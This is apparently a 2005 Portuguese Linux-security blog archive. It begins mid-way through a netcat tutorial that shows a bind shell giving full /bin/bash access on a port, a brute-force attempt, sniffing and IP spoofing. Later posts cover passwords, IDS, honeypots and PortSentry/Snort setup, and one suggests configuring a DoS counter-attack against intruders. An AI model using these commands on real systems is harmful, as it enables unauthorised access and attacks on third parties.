No lado cliente da conexão, simplesmente conecta-se à porta do servidor e passa-se o arquivo a ser tranferido como entrada.

Servidor:
$ nc -vvn -l -p 3000 -w 30 > file
Listening on any address 3000

Cliente:
$ nc -vvn -w 2 10.0.0.1 3000 <>

O servidor irá mostrar a seguinte mensagem quando uma conexão for estabelecida:
Connection from 10.0.0.1:1028

Novamente, a conexão deve ser terminada usando-se o CTRL-C. O servidor irá mostrar:
Exiting.
Total received bytes: 6
Total sent bytes: 0

Enquanto que o cliente mostrará:
Total received bytes: 0
Total sent bytes: 6

4- Escaneando portas
Será feita uma tentativa de conexão à um IP ou host e será estipulada as portas da tentativa de conexão:
$ nc -vv www.qualquer_site.com.br 110 80 139
$ nc -vv www.qualquer_site.com.br 1-10000

No primeiro exemplo serão escaneadas apenas as portas 110 (POP3), 80 (web) e 139 (compartilhamento do Windows). Já no segundo exemplo serão escaneadas desde a porta 1 até a 10000. (range port de 1-10000)

5- Abrindo a porta, dando acesso a uma "shell" .:[ Trojan ]:.
Será colocada a porta X em listenning, redirecionaremos a saída de dados para um shell (/bin/bash). Assim quando alguém se conectar a essa porta terá domínio total sobre o computador. Funciona de forma semelhante a um trojan.
$ nc -l -e /bin/bash -p 2332

Nesse caso acima quem se conectar à máquina na porta 2332 terá acesso irrestrito nela.

6- Usando como brute-force
Comando:
$ nc -vv 79 < ~/wordlists.txt > bruteforce_OK.log

Note que conectaremos a porta do FINGER(79) e redirecionaremos o conteúdo do arquivo wordlists.txt para essa porta. Quando algum resultado for válido ele será salvo em bruteforce.log para uma análise posterior dos resultados.
Lembrem-se, ssh ele dropa e faz LOG das conexões após três tentativas de conexão. Então muito cuidado ao usar o brute force.

7- Fazendo um sniffer
Além de tudo isto demonstrado acima, o Netcat ainda pode capturar todo o tráfego de uma rede. Iremos nos conectar a uma porta e mandar o netcat "dar eco" nela, ou seja, exibir TUDO o que passa por ela. Após isso, é só redirecionar tudo o que o Netcat gravou para um arquivo.
Veja o comando, para melhor compreensão:
$ nc -vv -L 127.0.0.1 -p 80 > ~/sniffing.log

Nesse caso todos os dados que passarem pela porta 80 da sua máquina (127.0.0.1) será gravado no arquivo sniffing.log

8 - IP Spoofing
Usando o netcat, você pode fazer inclusive spoofing de endereços IP. Se você estiver escutando o tráfego em um segmento, você pode enviar esse tráfego para outro host usando o protocolo UDP.
O comando deverá ser tipo:

$ tcpdump -l -xX -vvv -tttt | nc -u -s spoofed_ip listener_ip

Isso também requer que você configure o endereço IP spoofed para um alias na sua interface de rede:

$ ifconfig eth0:N spoofed_ip

onde N é o alias a ser configurado. Isso irá causar problemas com o host que está sendo spoofed, já que é feito o mesmo endereço IP é propagado por dois hosts na mesma rede. Para executar um spoofing sem causar tantos problemas, use a ferramenta hping (o próximo tutorial).

Agradecimentos ao Viva o Linux, ao google.com/linux , Linux IT... E muitos outros.

Qualquer dúvida é só escrever.

Mário Miranda de Magalhães

Dicas para uma senha segura!

2005-08-30T10:30:00.000-03:00

Andei conversando com colegas meus que atuam na mesma área que eu e nós chegamos à conclusãoque senhas fracas por usuários são um terror para qualquer administrador. Com base na nossa conversa escrevi esse "pequeno texto".

Vamos lá.

Será que sua senha é segura?

Você provavelmente já sabe que não deve criar senhas com combinações de seqüências consecutivas de números ou letras como "12345678", "lmnopqrs" ou as letras vizinhas no seu teclado, como "qwerty" ou "asdfg". E você também já deve ter ouvido dizer que não é uma boa idéia usar o seu nome de logon, o nome do marido/esposa ou a sua data de nascimento como senha. Mas você sabia que não deve nunca usar uma palavra que pode ser encontrada em um dicionário, em qualquer idioma?
Os hackers usam ferramentas sofisticadas que podem adivinhar senhas rapidamente com base em palavras encontradas em dicionários em vários idiomas, mesmo palavras comuns escritas ao contrário.
Se você usa uma palavra comum como senha, pode pensar que estará protegido se substituir as letras por números ou símbolos que se parecem com as letras, como M4r10 ou P4sSw0rd.
Os hackers conhecem esses truques também.

Como fazer sua própria senha segura!!!

Uma senha segura possui ao menos oito caracteres, inclui uma combinação de letras, números e símbolos e é fácil de ser lembrada, mas difícil de ser adivinhada.
O modo mais rápido de criar uma senha segura que você não precisará escrever num papel é criar uma frase secreta. Uma frase secreta é uma frase que você pode se lembrar facilmente, como: "Adoro meu computador!" e use a imaginação para misturar os os caracteres: "4meuc0mp!"
Bem simples não?

Como evitar que sua senha caia em mãos erradas!?

Mesmo que você saiba que não deve escrever as senhas ou compartilhá-las com amigos, você também deve ter cuidado quando a fornece ao site onde a criou. Um modo usado pelos hackers para enganar as pessoas é fazer com que forneçam suas senhas e outros dados pessoais através de um golpe chamado "phishing". O Phishing consiste em enviar emails falsos que parecem vir de sites populares como eBay, Amazon, VirtualCard, Bancos em geral. Os emails se parecem com os oficiais que muitas pessoas atendem a solicitações de digitar nome de usuário e senha.
Aí já se imagina o quanto de dor de cabeça você pode ter por ter sua senha de banco literalmente roubada.

Fique de olho!!!

A técnica de senha mais segura consiste em criar uma nova senha segura para cada site da Web ou logon que solicite uma. Isso é tão impossível quanto se lembrar de longas seqüências de caracteres aleatórios. Uma solução fácil é criar uma série de senhas seguras e usá-las nos sites em que você quer estar mais protegido, como bancos, corretagem de ações ou Servidores que você administra. Em seguida, crie uma série pequena de senhas fáceis de lembrar que você pode usar em qualquer lugar.
E não esqueça de troca-la periódicamente.

Se mesmo assim acontecer...

Se você desconfiar e/ou descobrir que sua senha foi comprometida tome providências imediatas:
Altere suas senhas.
Avise o serviço de atendimento ao cliente (SAC) das suas contas na Internet (provedor, e-mails e etc).
Avise o seu banco ou instituição financeira.
Solicite um relatório de situação cadastral aos serviços de proteção ao crédito. (SPC, SERASA e etc)

Em RESUMO

Sua senha deve ter no mínimo 8 caracteres;
Misture letras, dígitos e símbolos (*#$%!+ etc...);
Para criar uma senha fácil de lembrar e difícil de ser adivinhada, crie uma frase e use as iniciais, intercalando alguns dígitos ou símbolos:frase: "Charlie Brown nasceu em 2 de outubro"senha: CBne2d10 (trocando outubro por 10) ;
Troque sua senha constantemente. (de mês em mês já mais que o suficiente);

NÃO use somente letras minúsculas;
NÃO use palavras que constem em dicionário de qualquer idioma ou jargões técnicos;
NÃO use nomes de pessoas ou locais;
NÃO use informações pessoais facilmente acessíveis, como datas de nascimento, número de carteira de identidade, placa do carro;
NÃO use padrões simples ou repetitivos, como palavras de trás para frente ou seqüências numéricas;
NÃO escreva sua senha - memorize-a.

Mário Miranda de Magalhães

O que é um IDS?

2005-08-29T11:29:00.000-03:00

Como sempre o google me auxiliou mais uma vez na minha tentativa de definir melhor o que é um IDS.
Tenho alguns agradecimentos a fazer por esse texto:

William Vianna
Lucas Carvalho
Renata Mesquita

Pelo apoio, suporte e dicas sobre este texto. Muito Obrigado

Vamos ao que interessa.

No que consiste um IDS?

Desde o seu surgimento, muita pesquisa e dinheiro foram investidos em IDS o que fez com que seu avanço tecnológico crescesse extraordinariamente. Hoje os IDS permitem identificar e de imediato responder a atividades irregulares em um dado sistema. Não só o acesso à internet, mas toda a atividade de uma rede pode ser analisada na tentativa de identificar, por exemplo, um ataque DoS (Denial of Service - Negação de Serviço), ou de Spoofing (Enganando) e ainda contra-atacar ou bloquear IPs suspeitos. E IDS não se limita a apenas isso, porém para entendermos melhor seu funcionamento devemos saber conhecer suas duas principais estruturas conceituais de trabalho. Cada uma destas estruturas procura trabalhar da forma mais eficaz possível, porém de dois métodos simples: O método Preempitivo e o método Reacionário.

Descrição dos métodos de IDS:

Método Preempitivo:
Este método é conhecido por basicamente reconhecer, através de uma base de dados, a assinatura de ataques, ou seja, seqüências de ações já conhecidas de ataques. O IDS, de forma autônoma, observa a movimentação e o tráfego de rede destinado ao seu host e então as compara com seus registros para identificar possível tentativa de ataque a este host. Podemos comparar então o seu funcionamento com o de programas antivírus, sistemas assim são capazes de identificar a maioria dos ataques existentes.

Método Reacionário:
O IDS, através da análise dos logs do sistema, cria um perfil de comportamento para os usuários do sistema. O IDS reacionário é capaz de reagir como você à, por exemplo, mudança de atitude da Dona Maria do RH que sempre esteve habituada a apenas utilizar o programa de folha de pagamento e controle de funcionários e derrepente começa a varrer o sistema em busca de arquivos de configuração, interfaces de redes, portas do sistema, levando a um aumento do volume de processamento de CPU e por fim tentasse adivinhar a senha de outros usuários ou do próprio root. Diante desta novidade o IDS pode bloquear a conta da Dona Maria, lançar um contra-ataque para descobrir o endereço IP que esta sendo utilizado por ela, assim como outras informações e bloqueá-lo e enviar um e-mail para o administrador do sistema, tal qual como foi configurado.

Preempitivo X Reacionário:

Apesar de já existirem novos métodos de IDS, alguns utilizando inteligência artificial, Estes dois métodos são os mais conhecidos e empregados atualmente. Podemos dizer que o método Reacionário é o mais convencional de detecção de intrusões embora ambos os métodos tem sua eficácia comprovada, portando cabe ao leitor fazer o julgamento de suas estruturas e assim definir por sua própria conta qual é o melhor método para si. Para médotos Preemptivos, a ferramenta mais utilizada no linux é o Snort (o qual eu já falei anteriormente). Ferramenta Open-Source desenvolvida por Marty Roesch possui uma base de dados de milhares de registro comportamentais de possíveis métodos de ataques e é muito simples de ser usado. Já para métodos reacionários, o recomendado é o HostSentry que observa traços e registros de logs para traçar um perfil de comportamento de seus usuários. Também Open-Source para sistemas Unix (incluindo o Linux) esta ferramenta analisa anomalias de tempo e localidade para identificar horários padrões e locais de acessos.

Sabe-se que mesmo utilizando destas ferramentas nenhum sistema é totalmente seguro. Adotar políticas de senhas, fechar portas que não são usadas, utilizar um bom firewall, gravar e analisar com freqëncias logs de tudo que acontece, criptografar os dados, realizar atualizações de segurança dos programas e do próprio sistema operacional e manter-se informado além da utilização dos IDSs são as maiores ferramentas para manter-se protegido contra ataques. No caso de IDS, conhecer sua terminologia como False Negatives, False Positives, Fragmentation, Honeypot, Evasion e etc. é imprescindível para uma correta configuração de utilização desta tecnologia.

Espero ter dado uma luz sobre o Assunto.

Abraços

Mário Miranda de Magalhães

O que é um honeypot?

2005-08-29T10:19:00.000-03:00

Já que muita gente não sabe o que é um honeypot, resolvi escrever um pouco sobre o tema. O próximo tema (que já estou trabalhando nele) será sobre IDS's.
Achei a maioria das informações no google e em inglês. Fiz uma reunião do que eu achei sobre e ainda acrescentei algumas coisas que achei essencial.
Chega de papo. Vamos ao que realmente interessa.

O que é um Honeypot ??

Honeypot = Pote de Mel
Ferramenta de estudos de segurança, onde sua função principal é colher informações do atacante.
Elemento atraente para o invasor, ou melhor, uma iguaria para um hacker.

“Um honeypot é um recurso de rede cuja função é de ser atacado e compremetido (invadido). Significa dizer que um Honeypot poderá ser testado, atacado e invadido. Os honeypots não fazem nenhum tipo deprevenção, os mesmos fornecem informações adicionais de valor inestimável” Lance Spitzner - 2003

É um sistema que possui falhas de segurança reais ou virtuais, colocadas de maneira proposital, a fim de que seja invadido e que o fruto desta invasão possa ser estudado...

A história dos Honeypots

“The Cuckoo's Egg” de Cliford Stool–Durante 10 meses ( 1986/87 ) localizou e encurralou o hacker Hunter.

"An evening with Berferd” de BillCheswick–Durante meses estudos as técnicas e criou armadilhas para o hacker Berferd.

DTK – Deception Toolkit –Criado por Fred Cohen ( 1997 )–Scripts em Perl e C que simulam vários servidores– Software Livre – Utilizado nos dias de hoje

Sting – Cybercop ( NAI ) – Utilizado em ambiente Windows NT – Simulava uma rede inteira –Emitia respostas falsas para os atacantes simulando diversos ambientes operacionais.

Projeto Honeynet ( 1999 ) – Lance Spitzner e mais 30 especialistas–Desenvolveu metodologias –Tornou-se referência

Captura de Worms ( 2001 / 2002) – CodeRed II e W32/LeavesWorm–Dtspcd ( CDE Subprocess ControlService Server )

Honeyd – 2002 – Niels Povos – Honeypot Open Source

Tipos e Níveis de Honeypots

Honeypots de pesquisa – Acumular o máximo de informaçõesdos atacantes e suas ferramentas – Grau alto de comprometimento – Redes externas ou sem ligação com rede principal.

Honeypots de produção – Diminuir risco – Elemento de distração ou dispersão

Baixa Interatividade – Serviços Falsos – Listener TCP/UDP – Respostas Falsas
nc -l -p 80 > /var/log/honeypot.log

Média Interatividade – Ambiente falso – Cria uma ilusão de domínio da máquina – Estudo melhor das técnicas utilizadas – Invadir o sistema realmente !!

Alta Interatividade – SO com serviços comprometidos – Não perceptível ao atacante – Estudo melhor das técnicas utilizadas – Vários riscos: Utilização como trampolim... Repositório de informações roubadas

Espero ter sido claro e ter esclarecido algumas coisas.

Mário Miranda de Magalhães

Screenshot

2005-08-25T13:00:00.000-03:00

Como ando sem tempo para atualizar esse blog, vou postar um shot da maquina do meu trabalho.

Pra quem não sabe, sou um dos responsáveis pela segurança da informação de 3 redes (aproximadamente 650 máquinas) e de 13 servidores.

Para isso uso o que está no screenshot abaixo:

Espero que gostem.

Abraços

Mário Miranda de Magalhães

Instalando e configurando o Portsentry

2005-08-20T12:16:00.000-03:00

O Portsentry realiza toda essa tarefa e ainda permite que se responda ao possível ataque. Outra função muito útil do PortSentry é o bloqueio de ips dos possíveis atacantes ou seja, quando o cracker executa alguma tarefa suspeita seja ela um scan ou uma tentativa de entrar por alguma porta , esse IDS coloca o ip do invasor automaticamente em DENY, isto significa que qualquer conexão vinda deste ip será recusada.

Ok. Vamos colocar as mãos na massa.

INSTALAÇÃO
Bom a primeira coisa a fazer é fazer o download do PortSentry em
.:[ PortSentry ]:.

# mkdir /security
# mv portsentry-1.2.tar.gz /security
# cd /security
# tar -xzvf portsentry-1.2.tar.gz
# ./configure & make & make install

Feita a instalação, os arquivos necessários para a configuração estão em: /usr/local/psionic/portsentry/

portsentry.conf
portsentry.ignore

E o binário em : /usr/local/bin
portsentry

O Arquivo de configuração portsentry.conf é onde faremos a maioria das configurações.

Vou comentar algumas destas opções:

Diretiva PORT CONFIGURATIONS
Esta diretiva define quais são as portas TCP e UDP que ficarão sob os cuidados do PortSentry.Existem 3 opções : a primeira é a mais simples, monitorando apenas algumas portas; a segunda é uma intermediária, ideal pra quem quer usar o Portsentry em servidores que não desempenham funções tão importantes. Já a terceira é bem agressiva, ideal para utilizá-la para contra ataques. Bom agora é so fazer sua escolha, eu vou me basear na segunda opção a JUST TO BE AWARE, mas você pode escolher qualquer outra opção e a configuração será praticamente a mesma.

#Just to be aware
TCP_PORTS="1,11,15,23,79,111,119,143,540,635,1080,1524,2000,5742, 6667,2345,12346,20034,31337,32771,32772,32773,32774,40421,49724,54320"
UDP_PORTS="1,7,9,69,161,162,513,635,640,641,700,32770,32771, 32772,32773,32774,31337,54321"

Aqui estão as portas TCP/UDP que o PortSentry vai "guardar". Analise as portas que tem em cada lista. As portas verdadeiras de seu sistema não devem constar nesta lista. Caso contrário, o PS vai bloquear as tentativas de conexão nelas.

Diretiva ADVANCED STEALTH SCAN DETECTION OPTIONS
Nesta opção será declarada a porta que o PortSentry irá verificar com mais cuidado...por default é 1023 tanto para TCP e UDP, não é necessário mudar essa porta, caso você mude tome cuidado para não colocar uma porta que algum serviço esteja rodando!.

ADVANCED_PORTS_TCP="1023"ADVANCED_PORTS_UDP="1023"

Além disso é nessa mesma seção que você indica ao PortSentry quais portas serão excluídas da verificação.

ADVANCED_EXCLUDE_TCP="113,139"ADVANCED_EXCLUDE_UDP="520,138,137,67"

Diretiva CONFIGURATION FILES

O primeiro arquivo são os hosts que o PortSentry deve ignorar, ou seja, os hosts que estiverem nesta list não serão analisados por ele. O segundo é o history, ou seja, tudo que o PS já fez, desde analisar conexões até bloquear, tudo estará listado neste arquivo. Equivale a um ~/.bash_history. O terceiro é a lista negra do PortSentry, os atacantes bloqueados por ele e os hosts que ele considera como perigosos. Nessa lista você deve ficar esperto porque às vezes alguém pode cair aí por engano de um falso positivo, então fique sempre analisando esta lista para não ficar sem determinados serviços de comunicação.

IGNORE_FILE="/usr/local/psionic/portsentry/portsentry.ignore"
HISTORY_FILE="/usr/local/psionic/portsentry/portsentry.history"
BLOCKED_FILE="/usr/local/psionic/portsentry/portsentry.blocked"

Diretiva IGNORE OPTIONS
É nesta diretiva que você deve especificar o que o Portsentry vai fazer quando suspeitar de um ataque. Para lançar um contra ataque quando um cracker tentar scanear suas portas habilite as opções e set-as como

BLOCK_UDP="1"BLOCK_TCP="1"
Para
BLOCK_UDP="2"BLOCK_TCP="2"

Depois disso você deve configurar a linha EXTERNAL COMMAND

Diretiva DROPPING ROUTES

Defina aqui como o Portsentry irá tratar um possível ataque. A solução mais comum é colocar o IP do invasor em DENY com o iptables. Para isso habilite a seguinte linha

KILL_ROUTE="/usr/local/sbin/iptables -I INPUT -s $TARGET$ -j DROP"

Como você pode ver, é uma regra simples, você pode melhorar a regra do jeito que achar melhor e tudo mais, iptables meu amigo, tem 10001 possibilidades.

OBS: $TARGET$ = ip do atacante que ele detectou.

Além de bloquear pelo iptables você também pode utilizar TCP Wrappers para isso:

KILL_HOSTS_DENY="ALL: $TARGET$ # PortSentry blocked"

Não recomendo a seção de Droping Route porque dá mais trabalho de liberar IPs bloqueados. KILL_ROUTE já é mais que suficiente.

Diretiva EXTERNAL COMMANDS

É aqui que você especifica o contra ataque, agora é a sua imaginação. Perceba que esta é uma opção a parte, ou seja, você pode rodar qualquer script aki.

KILL_RUN_CMD="/some/path/here/script $TARGET$ $PORT$"

OBS : Se você quiser é possivel colocar nessa linha um script que permita um ataque de DoS direcionado para o invasor.

Diretiva SCAN TRIGGER VALUE

Esta seção permite que você especifique ao PortSentry, após quantas tentativas de ataque o Portsentry vai soar o alarme ou fazer um possível contra-ataque. O default é 0 mas se pode alterar o valor entra 0 e 2

SCAN_TRIGGER="0"

Diretiva PORT BANNER SECTION

Com esta diretiva, é possível inserir uma mensagem de aviso para o intruso. Para habilitá-la, basta retirar # da linha.

PORT_BANNER="** ACESSO PROIBIDO *** INTRUSION DETECTION SYSTEM"

Pronto, nosso portsentry.conf está configurado agora temos que dar uma olhada no portsentry.ignore.
O Arquivo de configuração - Portsentry.ignore
Nesse arquivo você define quais hosts estarão fora dessas regras, ou seja, se colocarmos o seguinte
ip : 192.1.1.1 , o mesmo estará livre de todas essas configurações.

# Put hosts in here you never want blocked. This includes the IP addresses# of all local interfaces on the protected host (i.e virtual host, mult-home)
# Keep 127.0.0.1 and 0.0.0.0 to keep people from playing games.
127.0.0.1
192.1.1.1

RODANDO O PORTSENTRY

Agora estamos prontos para rodar o Portsentry e deixá-lo funcionando. Para isso execute o binário que fica em /usr/local/bin.
# portsentry -tcp
# portsentry -udp

DETECTANDO UM ATAQUE
Depois de configurado, veremos as saídas que o PortSentry gera, suponhamos que um cracker em 192.1.1.1 tentou atacar um Slackware em 192.1.1.2

1º O cracker tenta se conectar via telnet pela porta 1080 ( que aliás é protegida pelo PortSentry)

Trying 192.1.1.2...
Connected to 192.1.1.2
Escape character is ?^ ]?
.****Acesso Proibido **** Intrusion Detection System

2º Logo após isso o ip do cracker é colocado em deny em /etc/hosts.deny
ALL : 192.1.1.1

3º Será registrado em portsentry.blocked.tcp em /usr/local/psionic/portsentry/ algumas informações do atacante, vale lembrar que este arquivo tem a mesma função do hosts.deny porém dá uma saída mais detalhada.
989675443 - 20/05/2001 10:50:43 Host windows.net.com.br/192.1.1.1 Port:1080 TCP Blocked

4º Posteriormente o Portsentry fará o iptables negar as conexões vindas de 192.1.1.1
Essas informações foram retiradas de uma tentativa de conexão via uma porta TCP se fosse um UDP as saídas iriam ser as mesmas a não ser o arquivo portsentry.blocked.tcp seria portsentry.blocked.udp

DESBLOQUEANDO IPS
A primeira coisa a fazer para desbloquear um ip, bloqueado pelo PortSentry é retirar a regra que bloqueia o host pelo iptables
Depois disto retire a entrada referente ao IP do cracker no /etc/hosts.deny e ou /usr/local/psionic/portsentry/portsentry.blocked.tcp ou /usr/local/psionic/portsentry/portsentry.blocked.udp

Agora inicialize o Portsentry e pronto. Vc tem UM IDS implementado no seu sistema.

Instalando e configurando o SNORT

2005-08-17T14:07:00.000-03:00

Para escrever esse texto, busquei informações em alguns lugares:

Viva o Linux
LinuxIT
Snort
Google

Mãos à obra:

O Snort é uma das ferramentas mais utilizadas com o intuito de entre outras coisas detectar no momento o acesso não autorizado, vale lembrar que no site [ http://www.snort.org/ ] também tem uma versão desse IDS para plataforma Microsoft.

Faça o download do snort no site já mencionado para qualquer diretório. O processo de descompactação e instalação é o seguinte:

# tar zxvf snort.x.x.tar.gz (x.x é a versão)

Será descompactado e criado um diretório snort.x.x, entre nesse diretório e continue...

# ./configure -prefix=/usr/local/snort

# make

# make install

O snort será instalado no diretório /usr/local/snort. Agora temos o snort instalado e pronto para ser configurado, para isso vamos precisar fazer mais alguns Passos, são eles:

01. Criar o diretório onde será guardado o arquivo de log do snort.

02. Criar o diretório no /ETC onde ficará o snort.conf e os arquivos rules.

03. Fazer as copias necessárias do arquivos mencionados.

04. E a configuração propriamente dita.

Passo 1
# mkdir /var/log/snort

Passo 2
# mkdir /etc/snort

Passo 3
# cp /usr/local/snort/*.* /etc/snort # cp /usr/local/snort/rules/*.* /etc/snort

Passo 4
# pico /etc/snort/snort.conf (esse é o arquivo de configuração)

Localize as seguintes linhas no arquivo citado acima:

# Path to your rules files (this can be a relative path)
var RULE_PATH ../rules

Essa linha configura o caminho onde ficarão os arquivos de regras, ela deve ficar conforme abaixo:

# Path to your rules files (this can be a relative path)
var RULE_PATH /etc/snort

No final do arquivo snort.conf, vocês encontrarão as linhas que ativam/desativam o uso das regras (rules) como no exemplo abaixo. Retire o símbolo de comentário no início de cada linha(#) caso queira ativar a linha.

#include $RULE_PATH/local.rules
#include $RULE_PATH/bad-traffic.rules
#include $RULE_PATH/tftp.rules

Estas linhas são as regras que o Snort utilize para identificar e interpretar os ataques realizados em sua máquina por possíveis invasores, você encontrará regras para identificar ataques de Denial of Service, uso de P2P, uso de Port Scanners, cabe a você escolher quais regras serão mais úteis. Salve e feche o arquivo snort.conf.
Para executar o snort, execute a linha abaixo:

# /usr/local/snort/bin/snort -c /etc/snort/snort.conf -i eth0 &

A opção –i indica qual a interface que o snort estará "escutando", você pode colocar essa linha no /etc/rc.local para garantir a inicialização sempre que o servidor for reiniciado. A opção & indica que o serviço será rodado em Background.
Por fim no diretório /var/log/snort será criado automaticamente o arquivo alert, monitore sempre esse arquivo para verificar possíveis invasões.

Espero ter sido bem claro.

Mário Miranda de Magalhães

Ferramentas de segurança.

2005-08-15T12:10:00.000-03:00

Bem, como eu já escrevi sobre scanners e exploits, agora vamos a um ponto bem divertido da segurança de redes. Como impedir que seu sistema seja comprometido.

Vamos partir do básico sobre segurança. Nenhum sistema é 100% seguro! E há algumas etapas q a maioria dos invasores usam, e são elas:

Levantar informações sobre o sistema.
Saber quais serviços estão funcionando nos servidores.
Em quais portas esses serviços estão funcionando.
Quais usuários estão no sistema
E ataque do sistema (DOS, exploits, DDOS e etc).

A maioria desses passos pode ser conseguida através de um bom scanner (ambos já citados nos 2 textos anteriores). Para barrar o atacante na etapa da tentativa de obetenção de informações sobre a maquina em questão é um ponto crucial para a segurança.
Há algumas formas de se lidar com isso. A mais simples, que é simplesmente barrar a opção de portscanners da máquina. E a outra mais complexa e mais completa, é instalar um NIDS ( Network Intrusion Detection System ).

Há vantagens nos dois tipos de solução:

Barrar os portsscanners - Você simplesmente não perminte e nem precisa se preocupar com os portscans.

NIDS - Você além de enganar o atacante, você ainda obtem um perfil do que ele fez para tentar entrar no seu sistema e assim poder tomar medidas de segurança baseadas nas ações dos atacantes.

Para acabar com portscanners é bem simples, basta duas entradas no iptables:

no seu script de firewall acrescente as linhas

#Alterar policiamento
iptables -P INPUT DROP
iptables -P FORWARD DROP

Como implementar um IDS é uma tarefa mais complicada e sensível, no meu proximo post irei escrever sobre como implementar o SNORT, o IDS mais usado hoje.

[]'s

Mário Miranda de Magalhães

Tutoriais de ferramentas de rede

2005-08-12T18:54:00.000-03:00

Eu falei que faria alguns tutoriais sobre algumas das minhas ferramentas de segurança, mas resolvi não fazer, já que achei tutoriais muito bons e em português.

Todos eles foram tirados de um site que eu já citei aqui, o Viva o Linux.

Abaixo estão alguns deles:

nmap

nessus

netcat

Espero que seja proveitoso.

Mário Miranda de Magalhães

Redes no linux

2005-08-11T16:16:00.000-03:00

Estou a algum tempo sem escrever aqui. Mas vou compensar o tempo com alguma leitura boa.

Ultimamente tenho trabalhado na segurança de rede de uma instituição federeal. O que abriu meus horizontes quanto a área ampla de servidores e administração dos mesmos (que sempre foi minha paixão).

O legal de tudo isso é que eu estou tendo a oportunidade de trabalhar com todos os tipos de sistemas misturados.

OK. vamos ao que interessa:

Testar segurança não é uma tarefa muito difícil. Basta ler um pouco, saber inglês e usar as ferramentas corretas.
Digamos que testar a segurança no Microsoft Windows é uma tarefa precária.

Ter em mente que segurança da informação não é somente corrigir bugs de segurança é muito importante, pois há usuários dependentes do sistema. E eles sim são a parte que se deve tomar cuidado.

Algumas ferramentas que eu uso para auditoria, testes e correções no quesito que estamos abordando:

Nmap
Ethereal
Nessus
Ping
NetCat
Metasploit
google.com

Essa listinha é o que eu uso com mais frêquencia, com certeza há outras ferramentas, mas essas são as que eu uso.
Vou colocar aqui uma descrição básica do que cada um faz e quando eu tiver um tempo maior coloca alguns tutoriais de como usar esses programas.

Nmap - Um scanner de segurança. Básico, melhor usado em modo texto, mas muito eficiente. Uma cuirosidade sobre ele, é que ele ficou famoso por ter aparecido no filme MATRIX.

Nessus - Outro scanner de segurança, mais encorpado, é gráfico. Procura por portas e faz muitas requisições ao mesmo tempo, uma das melhores ferramentas atuais. Te dá graficos detalhados, possiveis problemas de segurança, quais seriam os problemas q eu poderia ter se não resolvesse e como resolve-los.

Ethereal - É um network analyser, ou seja, ele monitora tudo que entra e sai da sua placa de rede (também funciona com modems). Um sniffer, pra ser mais exato.

Netcat - Programa incluido em quase todas as distribuições linux. Permite gravar dados pela rede utilizando TCP/IP... Leve e poderoso.

Metasploit - Programa que possui um bando de dados de exploits. Ele analisa se um host tem vulnerabilidades e o ataca. mostrando logo em seguida um terminal com o controle do host atacado.

Até uma proxima folga que eu tenha pra escrever aki.

Mário Miranda de Magalhães

Alguns sites úteis.

2005-06-27T14:27:00.000-03:00

Bem galera, como não sou um dinossauro do OpenSource tive uma ajuda formidável de alguns sites. então vou coloca-los aqui com uma breve descrição do conteúdo deles.

O site que me ajudou muito com a interface e a configuração do meu Ambiente X foi o http://www.planetacybertron.cjb.net : Lá tem de tudo pra deixar sua interface grafica bonitinha: Ex: Gkrellm transparente e com os plugins mais importantes, tutoriais legais sobre alguns players, wine e etc. Vale a pena conferir. Me ajudou bastante.

Outro que eu também tiro como ponto de referência é o Viva o Linux ( http://www.vivaolinux.com.br ), ele é um verdadeira portal de informações. Quase tudo que você procurar sobre linux lá você vai achar e se não achar você pode perguntar... O site tem uma interface meio complicada, mas com o tempo você se acostuma... Fora um problema de paginação (as buscas no site só apontam 15 resultados). Mas fora isso, o site é muito bom. Muito material importante.

Com as informações encontradas nesses dois sites acho que já dá um bom material pra quem precisa das coisas mais comuns.

Fora isso, estou tendo problemas com meu The Gimp. ele tah recusando minha GLIBC... To tentando, quando conseguir eu posto aqui qual foi a solução que eu dei.

Abraços.

Mário Miranda

Introdução

2005-06-20T13:08:00.000-03:00

Nesse Blog aqui, vou colocar algumas das minhas experiências com o mundo OpenSource.

Bem, Meu nome é Mário Miranda (vulgo d4rk)... Estou a três meses só uso Linux... Isso mesmo, nada de dual boot. Uso Slackware 10.0 o meu X é o XORG... Meu gerenciador é o Enlightenment DR16. Uso Nestcape, amsn, gkrellm, xmms, Eterm, swaret, the gimp... E as stuffs que vêm com o Slackware 10.0

Depois de muito trabalho para eu conseguir configurar o swaret consegui manter meu Slack atualizado...
Foi outra luta achar a libs pra rodar o enlightenment... Pq tiver q compilar todas, não havia nenhum tgz disponível.

Mas enfim, hoje em dia só utilizo linux.

Essa é só uma apresentação... Durante os dias vou postando aqui e mostrando o dia a dia com essa plataforma.